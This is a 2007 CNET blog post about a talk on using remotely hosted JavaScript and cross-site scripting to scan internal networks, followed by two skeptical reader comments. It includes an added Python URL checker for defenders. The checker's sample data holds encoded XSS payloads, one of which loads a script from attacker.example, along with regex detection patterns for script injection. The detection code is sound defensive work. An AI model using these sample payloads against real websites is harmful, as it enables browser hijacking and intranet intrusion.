Alpha Blog: CNET's gadget & tech news and opinions blogged by our editors
February 06, 2007, 5:50 PM PST
Hacking Intranet Web sites from the outside
Posted by: Robert Vamosi

Jeremiah Grossman, CTO of WhiteHat Security, presented a talk about attacking Intranet networks, the networks inside an enterprise or home. He did not use Ajax, a Web 2.0 technology that lends itself to special kinds of abuse, but pure JavaScript. In several live demonstrations, Grossman showed how it was possible, by appending to a URL in the victim's browser a call to remotely hosted JavaScript, to see the victim's browser history or learn an internal IP address. With that information, he was then able to scan the internal network and locate any valid servers operating inside the corporate firewall.

He showed how an attacker could mask all this by placing a simple iframe over the legitimate browser screen, so the victim could keep using the browser to surf the Net, unaware that JavaScript was running in the background. For fun, the attacker could send messages to the victim that would appear as alert dialog boxes.

Cross-site scripting is not new; Billy Hoffman talked about these kinds of attacks at last summer's Black Hat Briefings. What is new is the ability to hack into someone's internal network via unlikely sources, such as a Web-enabled printer or even a Web-enabled UPS strip.

Grossman recommends that users be suspicious of long URLs and, when in doubt, type the address out by hand. Further, he points out that because no malware is involved in these attacks, antivirus and similar software solutions won't stop them. He uses a secure browser, like Firefox, and adds that plug-ins such as the Netcraft toolbar and the NoScript extension can further block these attacks. A more drastic approach would be to disable Java, JavaScript, and ActiveX, but doing so could reduce the functionality of some Web sites.
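The attack described above starts with a URL that carries a reference to remotely hosted JavaScript, which the site then reflects into its own page. The following is an added example, not code from Grossman's talk or from CNET: a defender-side check of the kind a reverse proxy or web framework could run over an incoming URL before any parameter is echoed into HTML. It percent-decodes each query parameter (repeatedly, because payloads are often double-encoded), then flags script tags, `javascript:` URIs, inline event handlers, and in particular a `<script src=...>` whose host is not the site's own. All hostnames and URLs in the block are constructed for illustration.

```python
"""Flag URLs whose query string carries a script-injection payload.

Added example (not from the talk or the article). The check is a coarse
heuristic meant to show the shape of the defence, not a complete filter:
real deployments combine it with output encoding on the server side.
Hostnames such as shop.example and attacker.example are constructed.
"""
import re
from urllib.parse import parse_qsl, unquote, urlsplit

SCRIPT_TAG = re.compile(r"<\s*script\b", re.IGNORECASE)
# Captures the host in <script src="http://host/..."> or <script src="//host/...">
SCRIPT_SRC = re.compile(
    r"<\s*script\b[^>]*\bsrc\s*=\s*['\"]?\s*(?:https?:)?//([^/'\"\s>]+)",
    re.IGNORECASE,
)
JS_URI = re.compile(r"javascript\s*:", re.IGNORECASE)
# An inline handler inside a tag is preceded by whitespace, a quote or a slash;
# requiring that prefix avoids matching ordinary words such as "one=".
EVENT_HANDLER = re.compile(r"[\s\"'/]on[a-z]+\s*=", re.IGNORECASE)


def _fully_decoded(value, rounds=3):
    """Percent-decode until the value stops changing (bounded to `rounds`)."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def inspect_url(url):
    """Return a list of human-readable findings; an empty list means clean."""
    parts = urlsplit(url)
    site_host = (parts.hostname or "").lower()
    findings = []
    # keep_blank_values so parameters like "?q=&x=" are still examined
    for name, raw in parse_qsl(parts.query, keep_blank_values=True):
        value = _fully_decoded(raw)  # parse_qsl already decoded once
        if SCRIPT_TAG.search(value):
            findings.append(f"{name}: <script> tag")
            m = SCRIPT_SRC.search(value)
            if m and m.group(1).lower() != site_host:
                # Script loaded from a host other than the site itself, the
                # "remotely hosted JavaScript" pattern the article describes.
                findings.append(f"{name}: external script host {m.group(1)}")
        if JS_URI.search(value):
            findings.append(f"{name}: javascript: URI")
        if EVENT_HANDLER.search(value):
            findings.append(f"{name}: inline event handler")
    return findings


def is_suspicious(url):
    """Convenience wrapper for a block/allow decision."""
    return bool(inspect_url(url))


if __name__ == "__main__":
    # Constructed sample URLs: one benign search, one reflected external script,
    # one double-encoded payload, one event-handler payload.
    SAMPLE_URLS = [
        "https://shop.example/search?q=shoes&page=2",
        "https://shop.example/search?q=%3Cscript%20src%3D%22http%3A%2F%2F"
        "attacker.example%2Fa.js%22%3E%3C%2Fscript%3E",
        "https://shop.example/search?q=%253Cscript%253Ex()%253C%252Fscript%253E",
        "https://shop.example/search?q=%3Cimg%20src%3Dx%20onerror%3Df()%3E",
    ]
    for u in SAMPLE_URLS:
        print(u[:60], "->", inspect_url(u) or "clean")
```

Because the check works on the decoded parameter values rather than on URL length, it catches the short encoded form as well as the long one the article tells users to watch for; the same-origin case (`<script src="//shop.example/...">`) is still reported as a script tag, only without the external-host finding.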

TalkBack (2 messages)

Home-based Hacking demo!

Yippee! The incredibly brilliant fellows at White Hat have shown us all yet another weakness in the computing infrastructure. All the hours they've invested to "discover" this weakness not only help consumers become more secure (...not really) and bolster White Hat's business prospects, they give the bad guys/gals another exploitation tip (absolutely)! Yes, I'm a cynic.

I recall reading many years ago about how John McAfee must be writing all the new viruses to support the sale of their anti-virus products too. All these so-called demos are nothing but marketing hype for these security vendors.

If criminals published their tips and secrets for fraud and phishing we'd be outraged. Yet, when the so-called good guys are actively working to identify new ways they can break into our networks, who are they helping? You never read about how to secure with white listing, do you? Define what's allowed and eliminate the rest? In other words, put controls in place. Don't introduce new technology and features willy-nilly. Keep Internet activity to well-known uses and don't veer off into the dark netherworld areas, so alluring as they may be, and reduce risks tenfold.

Seriously, how many home users do you think will be helped as compared to hackers and, by extension, the whitey hatters? Consumers 0, Hackers and WH 10! Yippee. Chalk another one up for the good guys!
by Schratboy - February 8, 2007 7:39 AM PST

Re: Hacking Intranet Web sites from the outside

Without having actually been there for the presentation, it is a bit difficult to respond directly to the ramifications of this "new" discovery. Printers, UPSs and a host of other devices that are configured to be "remotely" managed have always been a rather weak link in the security stance of homes, small business and yes, corporations.

So I suppose what I am trying to ask is: and.....? What's new with this info?
by Inetsec - February 7, 2007 2:37 PM PST

© 2008 CNET Networks, Inc., a CBS Company. All rights reserved.